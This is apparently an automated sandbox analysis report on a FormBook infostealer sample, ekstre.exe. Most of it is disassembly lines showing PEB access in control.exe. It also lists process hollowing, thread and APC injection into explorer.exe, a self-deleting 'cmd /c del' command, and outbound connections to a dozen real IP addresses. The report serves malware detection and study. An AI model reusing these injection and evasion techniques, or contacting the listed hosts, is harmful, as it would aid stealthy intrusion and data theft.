Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE2C10 mov eax, dword ptr fs:[00000030h]	4_2_04CE2C10
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCAC20 mov eax, dword ptr fs:[00000030h]	4_2_04CCAC20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCAC20 mov eax, dword ptr fs:[00000030h]	4_2_04CCAC20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCAC20 mov eax, dword ptr fs:[00000030h]	4_2_04CCAC20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE4C3D mov eax, dword ptr fs:[00000030h]	4_2_04CE4C3D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA8C3D mov eax, dword ptr fs:[00000030h]	4_2_04CA8C3D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D6ADD6 mov eax, dword ptr fs:[00000030h]	4_2_04D6ADD6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D6ADD6 mov eax, dword ptr fs:[00000030h]	4_2_04D6ADD6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA8DCD mov eax, dword ptr fs:[00000030h]	4_2_04CA8DCD
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAEDFA mov eax, dword ptr fs:[00000030h]	4_2_04CAEDFA
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7CDEB mov eax, dword ptr fs:[00000030h]	4_2_04D7CDEB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7CDEB mov eax, dword ptr fs:[00000030h]	4_2_04D7CDEB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CACD8A mov eax, dword ptr fs:[00000030h]	4_2_04CACD8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CACD8A mov eax, dword ptr fs:[00000030h]	4_2_04CACD8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB6D91 mov eax, dword ptr fs:[00000030h]	4_2_04CB6D91
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA6DA6 mov eax, dword ptr fs:[00000030h]	4_2_04CA6DA6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE2DBC mov eax, dword ptr fs:[00000030h]	4_2_04CE2DBC
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE2DBC mov ecx, dword ptr fs:[00000030h]	4_2_04CE2DBC
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84DA7 mov eax, dword ptr fs:[00000030h]	4_2_04D84DA7
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2CD40 mov eax, dword ptr fs:[00000030h]	4_2_04D2CD40
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2CD40 mov eax, dword ptr fs:[00000030h]	4_2_04D2CD40
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84D4B mov eax, dword ptr fs:[00000030h]	4_2_04D84D4B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D56D79 mov esi, dword ptr fs:[00000030h]	4_2_04D56D79
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBAD00 mov eax, dword ptr fs:[00000030h]	4_2_04CBAD00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBAD00 mov eax, dword ptr fs:[00000030h]	4_2_04CBAD00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBAD00 mov eax, dword ptr fs:[00000030h]	4_2_04CBAD00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBAD00 mov eax, dword ptr fs:[00000030h]	4_2_04CBAD00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBAD00 mov eax, dword ptr fs:[00000030h]	4_2_04CBAD00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBAD00 mov eax, dword ptr fs:[00000030h]	4_2_04CBAD00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD0D01 mov eax, dword ptr fs:[00000030h]	4_2_04CD0D01
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3CD00 mov eax, dword ptr fs:[00000030h]	4_2_04D3CD00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3CD00 mov eax, dword ptr fs:[00000030h]	4_2_04D3CD00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDCD10 mov eax, dword ptr fs:[00000030h]	4_2_04CDCD10
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDCD10 mov ecx, dword ptr fs:[00000030h]	4_2_04CDCD10
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D48D0A mov eax, dword ptr fs:[00000030h]	4_2_04D48D0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDAD20 mov eax, dword ptr fs:[00000030h]	4_2_04CDAD20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDAD20 mov eax, dword ptr fs:[00000030h]	4_2_04CDAD20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDAD20 mov eax, dword ptr fs:[00000030h]	4_2_04CDAD20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDAD20 mov ecx, dword ptr fs:[00000030h]	4_2_04CDAD20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDAD20 mov eax, dword ptr fs:[00000030h]	4_2_04CDAD20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDAD20 mov eax, dword ptr fs:[00000030h]	4_2_04CDAD20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDAD20 mov eax, dword ptr fs:[00000030h]	4_2_04CDAD20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDAD20 mov eax, dword ptr fs:[00000030h]	4_2_04CDAD20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDAD20 mov eax, dword ptr fs:[00000030h]	4_2_04CDAD20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDAD20 mov eax, dword ptr fs:[00000030h]	4_2_04CDAD20
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60D24 mov eax, dword ptr fs:[00000030h]	4_2_04D60D24
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60D24 mov eax, dword ptr fs:[00000030h]	4_2_04D60D24
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60D24 mov eax, dword ptr fs:[00000030h]	4_2_04D60D24
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60D24 mov eax, dword ptr fs:[00000030h]	4_2_04D60D24
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3CED0 mov ecx, dword ptr fs:[00000030h]	4_2_04D3CED0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84EC1 mov eax, dword ptr fs:[00000030h]	4_2_04D84EC1
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB2EE8 mov eax, dword ptr fs:[00000030h]	4_2_04CB2EE8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB2EE8 mov eax, dword ptr fs:[00000030h]	4_2_04CB2EE8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB2EE8 mov eax, dword ptr fs:[00000030h]	4_2_04CB2EE8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB2EE8 mov eax, dword ptr fs:[00000030h]	4_2_04CB2EE8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D6EEE7 mov eax, dword ptr fs:[00000030h]	4_2_04D6EEE7
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CACEF0 mov eax, dword ptr fs:[00000030h]	4_2_04CACEF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CACEF0 mov eax, dword ptr fs:[00000030h]	4_2_04CACEF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CACEF0 mov eax, dword ptr fs:[00000030h]	4_2_04CACEF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CACEF0 mov eax, dword ptr fs:[00000030h]	4_2_04CACEF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CACEF0 mov eax, dword ptr fs:[00000030h]	4_2_04CACEF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CACEF0 mov eax, dword ptr fs:[00000030h]	4_2_04CACEF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDAE89 mov eax, dword ptr fs:[00000030h]	4_2_04CDAE89
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDAE89 mov eax, dword ptr fs:[00000030h]	4_2_04CDAE89
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CECEA0 mov eax, dword ptr fs:[00000030h]	4_2_04CECEA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE2EB8 mov eax, dword ptr fs:[00000030h]	4_2_04CE2EB8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE2EB8 mov eax, dword ptr fs:[00000030h]	4_2_04CE2EB8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D70EAD mov eax, dword ptr fs:[00000030h]	4_2_04D70EAD
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D70EAD mov eax, dword ptr fs:[00000030h]	4_2_04D70EAD
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDEE48 mov eax, dword ptr fs:[00000030h]	4_2_04CDEE48
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAAE40 mov eax, dword ptr fs:[00000030h]	4_2_04CAAE40
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAAE40 mov eax, dword ptr fs:[00000030h]	4_2_04CAAE40
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAAE40 mov eax, dword ptr fs:[00000030h]	4_2_04CAAE40
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D6EE78 mov eax, dword ptr fs:[00000030h]	4_2_04D6EE78
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84E62 mov eax, dword ptr fs:[00000030h]	4_2_04D84E62
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D mov eax, dword ptr fs:[00000030h]	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D mov eax, dword ptr fs:[00000030h]	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D mov eax, dword ptr fs:[00000030h]	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D mov eax, dword ptr fs:[00000030h]	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D mov eax, dword ptr fs:[00000030h]	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D mov eax, dword ptr fs:[00000030h]	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D mov eax, dword ptr fs:[00000030h]	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D mov eax, dword ptr fs:[00000030h]	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D mov eax, dword ptr fs:[00000030h]	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D mov eax, dword ptr fs:[00000030h]	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D mov eax, dword ptr fs:[00000030h]	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D mov eax, dword ptr fs:[00000030h]	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D mov eax, dword ptr fs:[00000030h]	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D60E6D mov eax, dword ptr fs:[00000030h]	4_2_04D60E6D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CECE70 mov eax, dword ptr fs:[00000030h]	4_2_04CECE70
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB6E00 mov eax, dword ptr fs:[00000030h]	4_2_04CB6E00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB6E00 mov eax, dword ptr fs:[00000030h]	4_2_04CB6E00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB6E00 mov eax, dword ptr fs:[00000030h]	4_2_04CB6E00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB6E00 mov eax, dword ptr fs:[00000030h]	4_2_04CB6E00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE8E15 mov eax, dword ptr fs:[00000030h]	4_2_04CE8E15
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84E03 mov eax, dword ptr fs:[00000030h]	4_2_04D84E03
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D46E30 mov eax, dword ptr fs:[00000030h]	4_2_04D46E30
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D46E30 mov eax, dword ptr fs:[00000030h]	4_2_04D46E30
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D78E26 mov eax, dword ptr fs:[00000030h]	4_2_04D78E26
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D78E26 mov eax, dword ptr fs:[00000030h]	4_2_04D78E26
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D78E26 mov eax, dword ptr fs:[00000030h]	4_2_04D78E26
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D78E26 mov eax, dword ptr fs:[00000030h]	4_2_04D78E26
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CECE3F mov eax, dword ptr fs:[00000030h]	4_2_04CECE3F
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB2E32 mov eax, dword ptr fs:[00000030h]	4_2_04CB2E32
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D6EFD3 mov eax, dword ptr fs:[00000030h]	4_2_04D6EFD3
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84FFF mov eax, dword ptr fs:[00000030h]	4_2_04D84FFF
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov eax, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov ecx, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov ecx, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov eax, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov ecx, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov ecx, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov eax, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov eax, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov eax, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov eax, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov eax, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov eax, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov eax, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov eax, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov eax, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov eax, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov eax, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC6FE0 mov eax, dword ptr fs:[00000030h]	4_2_04CC6FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD8FFB mov eax, dword ptr fs:[00000030h]	4_2_04CD8FFB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D38F8B mov eax, dword ptr fs:[00000030h]	4_2_04D38F8B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D38F8B mov eax, dword ptr fs:[00000030h]	4_2_04D38F8B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D38F8B mov eax, dword ptr fs:[00000030h]	4_2_04D38F8B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0F90 mov eax, dword ptr fs:[00000030h]	4_2_04CC0F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0F90 mov ecx, dword ptr fs:[00000030h]	4_2_04CC0F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0F90 mov eax, dword ptr fs:[00000030h]	4_2_04CC0F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0F90 mov eax, dword ptr fs:[00000030h]	4_2_04CC0F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0F90 mov eax, dword ptr fs:[00000030h]	4_2_04CC0F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0F90 mov eax, dword ptr fs:[00000030h]	4_2_04CC0F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0F90 mov eax, dword ptr fs:[00000030h]	4_2_04CC0F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0F90 mov eax, dword ptr fs:[00000030h]	4_2_04CC0F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0F90 mov eax, dword ptr fs:[00000030h]	4_2_04CC0F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0F90 mov eax, dword ptr fs:[00000030h]	4_2_04CC0F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0F90 mov eax, dword ptr fs:[00000030h]	4_2_04CC0F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0F90 mov eax, dword ptr fs:[00000030h]	4_2_04CC0F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0F90 mov eax, dword ptr fs:[00000030h]	4_2_04CC0F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE8FBC mov eax, dword ptr fs:[00000030h]	4_2_04CE8FBC
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB4FB6 mov eax, dword ptr fs:[00000030h]	4_2_04CB4FB6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDCFB0 mov eax, dword ptr fs:[00000030h]	4_2_04CDCFB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDCFB0 mov eax, dword ptr fs:[00000030h]	4_2_04CDCFB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D6AF50 mov ecx, dword ptr fs:[00000030h]	4_2_04D6AF50
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D50F49 mov eax, dword ptr fs:[00000030h]	4_2_04D50F49
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D50F49 mov eax, dword ptr fs:[00000030h]	4_2_04D50F49
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D50F49 mov eax, dword ptr fs:[00000030h]	4_2_04D50F49
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D06F70 mov eax, dword ptr fs:[00000030h]	4_2_04D06F70
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84F7C mov eax, dword ptr fs:[00000030h]	4_2_04D84F7C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D6EF66 mov eax, dword ptr fs:[00000030h]	4_2_04D6EF66
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAEF79 mov eax, dword ptr fs:[00000030h]	4_2_04CAEF79
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAEF79 mov eax, dword ptr fs:[00000030h]	4_2_04CAEF79
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAEF79 mov eax, dword ptr fs:[00000030h]	4_2_04CAEF79
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDAF72 mov eax, dword ptr fs:[00000030h]	4_2_04CDAF72
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84F1D mov eax, dword ptr fs:[00000030h]	4_2_04D84F1D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCCF00 mov eax, dword ptr fs:[00000030h]	4_2_04CCCF00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCCF00 mov eax, dword ptr fs:[00000030h]	4_2_04CCCF00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF0F16 mov eax, dword ptr fs:[00000030h]	4_2_04CF0F16
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF0F16 mov eax, dword ptr fs:[00000030h]	4_2_04CF0F16
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF0F16 mov eax, dword ptr fs:[00000030h]	4_2_04CF0F16
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF0F16 mov eax, dword ptr fs:[00000030h]	4_2_04CF0F16
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D38F3C mov eax, dword ptr fs:[00000030h]	4_2_04D38F3C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D38F3C mov eax, dword ptr fs:[00000030h]	4_2_04D38F3C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D38F3C mov ecx, dword ptr fs:[00000030h]	4_2_04D38F3C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D38F3C mov ecx, dword ptr fs:[00000030h]	4_2_04D38F3C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA88C8 mov eax, dword ptr fs:[00000030h]	4_2_04CA88C8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA88C8 mov eax, dword ptr fs:[00000030h]	4_2_04CA88C8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB08CD mov eax, dword ptr fs:[00000030h]	4_2_04CB08CD
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB08CD mov eax, dword ptr fs:[00000030h]	4_2_04CB08CD
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC28C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC28C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC28C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC28C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC28C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC28C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC28C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC28C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC28C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC28C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC28C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC28C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC28C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC28C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC28C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC28C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC28C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC28C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC28C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC28C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC28C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC28C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC28C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC28C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC28C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC28C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D488FB mov eax, dword ptr fs:[00000030h]	4_2_04D488FB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA8F0 mov eax, dword ptr fs:[00000030h]	4_2_04CBA8F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA8F0 mov eax, dword ptr fs:[00000030h]	4_2_04CBA8F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA8F0 mov eax, dword ptr fs:[00000030h]	4_2_04CBA8F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA8F0 mov eax, dword ptr fs:[00000030h]	4_2_04CBA8F0

Source: C:\Windows\SysWOW64\control.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe

0_2_00403640

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 67.21.93.229 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.29.145.79 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 212.32.237.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 112.196.98.174 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.132.157.81 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.186.51 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.33.123.34 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 62.149.128.45 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.216 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\ekstre.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: A70000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\ekstre.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\ekstre.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\ekstre.exe	Thread register set: target process: 4744			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 4744			Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe	Process created: C:\Users\user\Desktop\ekstre.exe C:\Users\user\Desktop\ekstre.exe			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ekstre.exe"			Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe

0_2_00403640

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 4.2.control.exe.2f2b960.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1255579252.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.5836342798.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.5837726512.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 4.2.control.exe.2f2b960.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1382219110.00000000367E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
